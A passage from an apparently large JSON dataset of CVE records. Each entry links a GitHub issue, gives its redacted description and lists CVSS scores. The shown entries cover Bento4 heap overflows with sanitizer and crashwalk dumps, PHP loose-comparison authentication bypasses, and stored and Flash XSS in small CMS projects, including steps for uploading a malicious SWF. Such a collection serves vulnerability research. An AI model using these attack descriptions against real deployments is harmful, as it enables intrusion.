NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG ) const NUMBERTAG ABORTING",
  55701. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55702. "severity": "HIGH",
  55703. "baseScore": 7.5,
  55704. "impactScore": 3.6,
  55705. "exploitabilityScore": 3.9
  55706. },
  55707. {
  55708. "CVE_ID": "CVE-2020-23332",
  55709. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/510",
  55710. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/510",
  55711. "Repo_new": "axiomatic-systems/bento4",
  55712. "Issue_Created_At": "2020-05-16T11:33:57Z",
  55713. "description": "Heap buffer overflow in APITAG Command: ./mp NUMBERTAG aac APITAG /tmp/out.aac Information provided by address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG e NUMBERTAG a0 bp NUMBERTAG fffb3ea0f NUMBERTAG sp NUMBERTAG fffb3ea NUMBERTAG d0 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG c3ccb in APITAG , unsigned int, unsigned int&) ( PATHTAG NUMBERTAG a in APITAG , unsigned int) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG 
unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f3d NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Information provided by 
crashwalk: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: operator new(unsigned long NUMBERTAG ffff7e5f1d9: in PATHTAG Disassembly NUMBERTAG ffff7bef3da: xor edx,ed NUMBERTAG ffff7bef3dc: mov rsi,r NUMBERTAG ffff7bef3df: mov edi NUMBERTAG ffff7bef3e4: mov ea NUMBERTAG e NUMBERTAG ffff7bef3e9: syscall NUMBERTAG ffff7bef3eb: mov rax,QWORD PTR [rsp NUMBERTAG ffff7bef3f3: xor rax,QWORD PTR fs NUMBERTAG ffff7bef3fc: jne NUMBERTAG ffff7bef NUMBERTAG APITAG NUMBERTAG ffff7bef3fe: mov eax,r8d NUMBERTAG ffff7bef NUMBERTAG add rsp NUMBERTAG Stack Head NUMBERTAG entries): __GI_raise NUMBERTAG ffff7bef3eb: in (BL) __GI_abort NUMBERTAG ffff7bce NUMBERTAG in (BL) __libc_message NUMBERTAG ffff7c NUMBERTAG e: in (BL) malloc_printerr NUMBERTAG ffff7c NUMBERTAG dc: in (BL) _int_malloc NUMBERTAG ffff7c NUMBERTAG a: in (BL) __GI___libc_malloc NUMBERTAG ffff7c NUMBERTAG in (BL) operator NUMBERTAG ffff7e5f1d9: in PATHTAG APITAG NUMBERTAG bbc NUMBERTAG in PATHTAG APITAG NUMBERTAG f3fee: in PATHTAG APITAG NUMBERTAG ccadd: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG Registers: ra NUMBERTAG rb NUMBERTAG ffff7a NUMBERTAG rc NUMBERTAG ffff7bef3eb rd NUMBERTAG rsi NUMBERTAG fffffffce NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffd NUMBERTAG rsp NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffce NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffd0b0 r NUMBERTAG r NUMBERTAG ffff7ffb NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff7bef3eb efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra Data: Description: Heap error Short description: ERRORTAG NUMBERTAG Explanation: The target's backtrace indicates that libc has detected a heap error or that 
the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as APITAG etc. Since heap errors might include buffer overflows, use after free situations, etc. they are generally considered exploitable. END SUMMARY",
  55714. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55715. "severity": "HIGH",
  55716. "baseScore": 7.5,
  55717. "impactScore": 3.6,
  55718. "exploitabilityScore": 3.9
  55719. },
  55720. {
  55721. "CVE_ID": "CVE-2020-23333",
  55722. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/507",
  55723. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/507",
  55724. "Repo_new": "axiomatic-systems/bento4",
  55725. "Issue_Created_At": "2020-05-16T07:46:13Z",
  55726. "description": "Heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG I use my fuzzing project framework to find some vulnerabilities in mp NUMBERTAG aac with command line: mp NUMBERTAG aac APITAG /tmp/out.aac I found a heap buffer overflow in APITAG int, unsigned char, unsigned int, APITAG The output of address sanitizer is like this: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG fff NUMBERTAG bd0 sp NUMBERTAG fff NUMBERTAG bc8 READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG a NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, 
APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in operator APITAG long) PATHTAG NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG ( PATHTAG NUMBERTAG d NUMBERTAG fc in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG b NUMBERTAG d in APITAG int, unsigned char, unsigned int, APITAG APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG c8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG 
unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f7c4ad NUMBERTAG e2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) in APITAG int, unsigned char, unsigned int, APITAG Shadow bytes around the buggy address NUMBERTAG c0e7fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap 
left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  55727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55728. "severity": "HIGH",
  55729. "baseScore": 7.5,
  55730. "impactScore": 3.6,
  55731. "exploitabilityScore": 3.9
  55732. },
  55733. {
  55734. "CVE_ID": "CVE-2020-23334",
  55735. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/508",
  55736. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/508",
  55737. "Repo_new": "axiomatic-systems/bento4",
  55738. "Issue_Created_At": "2020-05-16T07:59:15Z",
  55739. "description": "SEGV on unknown address by a WRITE memory access in APITAG int, unsigned long long, APITAG I found a crash by running \"./mp NUMBERTAG aac APITAG APITAG The crash is identified as \"EXPLOITABLE\" by crashwalk. The result of crashwalk (!exploitable) is: CRASH SUMMARY Filename: APITAG SHA1: APITAG Classification: EXPLOITABLE Hash: APITAG Command: ./mp NUMBERTAG aac psym APITAG /tmp/out.aac Faulting Frame: APITAG int, unsigned long long, APITAG NUMBERTAG cac NUMBERTAG in PATHTAG Disassembly NUMBERTAG cac NUMBERTAG mov r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG ac NUMBERTAG APITAG NUMBERTAG cac6b: lea eax,[rb NUMBERTAG cac6e: mov rsi,r NUMBERTAG cac NUMBERTAG mov rdi,rbp NUMBERTAG cac NUMBERTAG mov BYTE PTR [r NUMBERTAG ra NUMBERTAG cac NUMBERTAG call NUMBERTAG bbc NUMBERTAG APITAG NUMBERTAG cac7e: pop rb NUMBERTAG cac7f: pop rbp NUMBERTAG cac NUMBERTAG pop r NUMBERTAG Stack Head NUMBERTAG entries): APITAG NUMBERTAG cac NUMBERTAG in PATHTAG APITAG NUMBERTAG cbac2: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG dbbfd: in PATHTAG APITAG NUMBERTAG cb NUMBERTAG in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG bdef3: in PATHTAG APITAG NUMBERTAG cbf9c: in PATHTAG APITAG NUMBERTAG cdb9c: in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG db NUMBERTAG in PATHTAG APITAG NUMBERTAG aee5a: in PATHTAG APITAG NUMBERTAG cc NUMBERTAG a: in PATHTAG Registers: ra NUMBERTAG ffffffff rb NUMBERTAG rc NUMBERTAG fe0 rd NUMBERTAG rsi NUMBERTAG fd0 rdi NUMBERTAG fb8 rbp NUMBERTAG fb8 rsp NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG fd0 r NUMBERTAG fffffffd NUMBERTAG r NUMBERTAG r NUMBERTAG ffff7d NUMBERTAG be0 r NUMBERTAG fd0 r NUMBERTAG a0 r NUMBERTAG r NUMBERTAG a0 rip NUMBERTAG cac NUMBERTAG efl NUMBERTAG cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG es NUMBERTAG fs NUMBERTAG gs NUMBERTAG Extra 
Data: Description: Access violation on destination operand Short description: APITAG NUMBERTAG Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. END SUMMARY The result of address sanitizer is: APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cf (pc NUMBERTAG c9eba bp NUMBERTAG ffedaf NUMBERTAG b0 sp NUMBERTAG ffedaf NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG c9eb9 in APITAG int, unsigned long long, APITAG ( PATHTAG NUMBERTAG d3ed8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG cc4e in APITAG int, unsigned long long, bool, bool, APITAG APITAG ( PATHTAG NUMBERTAG d3aa2 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG a3d1b in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d2fe8 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d9ab in APITAG APITAG unsigned long long) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG int, unsigned long long, bool, APITAG APITAG ( PATHTAG NUMBERTAG ccec in APITAG int, APITAG APITAG ( PATHTAG NUMBERTAG d3a NUMBERTAG in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG unsigned long long&, APITAG &) ( PATHTAG NUMBERTAG d NUMBERTAG db in APITAG APITAG &) ( PATHTAG NUMBERTAG e in APITAG APITAG bool) ( PATHTAG NUMBERTAG bb 
in APITAG bool) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG cf NUMBERTAG e2 in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG d in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG ) in APITAG int, unsigned long long, APITAG NUMBERTAG ABORTING",
  55740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55741. "severity": "HIGH",
  55742. "baseScore": 7.5,
  55743. "impactScore": 3.6,
  55744. "exploitabilityScore": 3.9
  55745. },
  55746. {
  55747. "CVE_ID": "CVE-2020-23355",
  55748. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1121",
  55749. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1121",
  55750. "Repo_new": "codiad/codiad",
  55751. "Issue_Created_At": "2020-05-21T11:11:22Z",
  55752. "description": "Potential risk of authentication bypass through magic hash and loose comparison. PATHTAG () URLTAG is potentially vulnerable to the magic hash problem, and the authentication can be bypassed in the loose comparison (==) If encrypted or hash value for the passwords form certain formats of magic hash, e.g NUMBERTAG e NUMBERTAG it can be bypassed. For example, if the server side stored password is a magic hash, then another user can also try a magic hash password to authenticate. It can be avoided by using strict comparison \u201c===\u201c. More info about magic hash can be found here URLTAG",
  55753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  55754. "severity": "HIGH",
  55755. "baseScore": 7.5,
  55756. "impactScore": 3.6,
  55757. "exploitabilityScore": 3.9
  55758. },
  55759. {
  55760. "CVE_ID": "CVE-2020-23359",
  55761. "Issue_Url_old": "https://github.com/renlok/WeBid/issues/530",
  55762. "Issue_Url_new": "https://github.com/renlok/webid/issues/530",
  55763. "Repo_new": "renlok/webid",
  55764. "Issue_Created_At": "2020-05-25T08:11:30Z",
  55765. "description": "Functional bugs in password rechecking during registration-related processes. APITAG NUMBERTAG FILETAG has the problem of password rechecking during registration because it uses a loose comparison to check whether two passwords are identical. Two non-identical passwords can still bypass the check. A lot of other PHP scripts in APITAG also have this problem including FILETAG , APITAG FILETAG , APITAG APITAG",
  55766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55767. "severity": "CRITICAL",
  55768. "baseScore": 9.8,
  55769. "impactScore": 5.9,
  55770. "exploitabilityScore": 3.9
  55771. },
  55772. {
  55773. "CVE_ID": "CVE-2020-23360",
  55774. "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/658",
  55775. "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/658",
  55776. "Repo_new": "oscommerce/oscommerce2",
  55777. "Issue_Created_At": "2020-05-26T05:59:06Z",
  55778. "description": "Username and password recheck bypassed. Hi, I just found that, in many places of oscommerce NUMBERTAG the username and password recheck during registration and other processes can be bypassed easily through magic strings in loose comparison, for example APITAG returns APITAG . If the user sets the username or password to such magic strings, the recheck process using loose comparison (==) does not work at all. Affected code locations PATHTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG PATHTAG L NUMBERTAG URLTAG and some other files in APITAG , APITAG and APITAG",
  55779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55780. "severity": "CRITICAL",
  55781. "baseScore": 9.8,
  55782. "impactScore": 5.9,
  55783. "exploitabilityScore": 3.9
  55784. },
  55785. {
  55786. "CVE_ID": "CVE-2020-23361",
  55787. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/668",
  55788. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/668",
  55789. "Repo_new": "phplist/phplist3",
  55790. "Issue_Created_At": "2020-05-26T07:47:33Z",
  55791. "description": "Bypass authentication through loose comparison. APITAG URLTAG has the potential of authentication bypass problem through loose comparison. (==). Here is another [example]. URLTAG A similar CVE can be found [ CVETAG CVETAG and here URLTAG In addition, in URLTAG It also uses a loose comparison. The functionality might not perform correctly for the password rechecking in the magic strings cases. For example NUMBERTAG e NUMBERTAG and NUMBERTAG e NUMBERTAG shall be equal under loose comparison, but actually they are not.",
  55792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55793. "severity": "CRITICAL",
  55794. "baseScore": 9.8,
  55795. "impactScore": 5.9,
  55796. "exploitabilityScore": 3.9
  55797. },
  55798. {
  55799. "CVE_ID": "CVE-2020-23369",
  55800. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/46",
  55801. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/46",
  55802. "Repo_new": "yzmcms/yzmcms",
  55803. "Issue_Created_At": "2020-05-22T17:05:17Z",
  55804. "description": "XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG SS in PATHTAG via the SRC attribute of an IFRAME element because of using APITAG NUMBERTAG APITAG APITAG Script tags are filtered, but iframe tags are not: FILETAG FILETAG Refer to: FILETAG",
  55805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55806. "severity": "MEDIUM",
  55807. "baseScore": 6.1,
  55808. "impactScore": 2.7,
  55809. "exploitabilityScore": 2.8
  55810. },
  55811. {
  55812. "CVE_ID": "CVE-2020-23370",
  55813. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/45",
  55814. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/45",
  55815. "Repo_new": "yzmcms/yzmcms",
  55816. "Issue_Created_At": "2020-05-22T16:55:04Z",
  55817. "description": "A Stored XSS exists in APITAG NUMBERTAG Description In APITAG NUMBERTAG Stored XSS exists via the PATHTAG action parameter, which allows remote attackers to upload a swf file. The swf file can be injected arbitrary web script or HTML. APITAG In PATHTAG when the value of action parameter is 'uploadvideo' or 'uploadfile', it allows remote user to upload a swf file: CODETAG So I write and compile an evil swf file whose source code is as follows: APITAG Then I upload the swf file through PATHTAG without login: FILETAG When background administrator previews this attachment, it will cause XSS attack: FILETAG",
  55818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55819. "severity": "MEDIUM",
  55820. "baseScore": 5.4,
  55821. "impactScore": 2.7,
  55822. "exploitabilityScore": 2.3
  55823. },
  55824. {
  55825. "CVE_ID": "CVE-2020-23371",
  55826. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/30",
  55827. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/30",
  55828. "Repo_new": "nangge/nonecms",
  55829. "Issue_Created_At": "2020-06-02T14:43:00Z",
  55830. "description": "APITAG NUMBERTAG has a XSS vulnerability in PATHTAG APITAG NUMBERTAG has a XSS vulnerability in PATHTAG I download the swfupload.swf file and I use APITAG to decompile the file. Then I find that user can control the APITAG parameter which will concatenate as the value of APITAG FILETAG Then I check the APITAG function, this is a piece of code that exists a Flash XSS vulnerability: FILETAG",
  55831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55832. "severity": "MEDIUM",
  55833. "baseScore": 6.1,
  55834. "impactScore": 2.7,
  55835. "exploitabilityScore": 2.8
  55836. },
  55837. {
  55838. "CVE_ID": "CVE-2020-23373",
  55839. "Issue_Url_old": "https://github.com/nangge/noneCms/issues/33",
  55840. "Issue_Url_new": "https://github.com/nangge/nonecms/issues/33",
  55841. "Repo_new": "nangge/nonecms",
  55842. "Issue_Created_At": "2020-06-03T02:49:26Z",
  55843. "description": "APITAG NUMBERTAG has a stored XSS vulnerability in PATHTAG Cross site scripting (XSS) vulnerability in PATHTAG in APITAG NUMBERTAG allows remote authenticated attackers to inject arbitrary web script or HTML via the name parameter. A remote user who has the right to modify navigation management can inject arbitrary web script or HTML in PATHTAG via the name parameter to cause xss attack. APITAG ERRORTAG FILETAG When front end users visit this column, it can also cause xss attack: APITAG FILETAG",
  55844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  55845. "severity": "MEDIUM",
  55846. "baseScore": 5.4,
  55847. "impactScore": 2.7,
  55848. "exploitabilityScore": 2.3
  55849. },
  55850. {
  55851. "CVE_ID": "CVE-2020-23374",
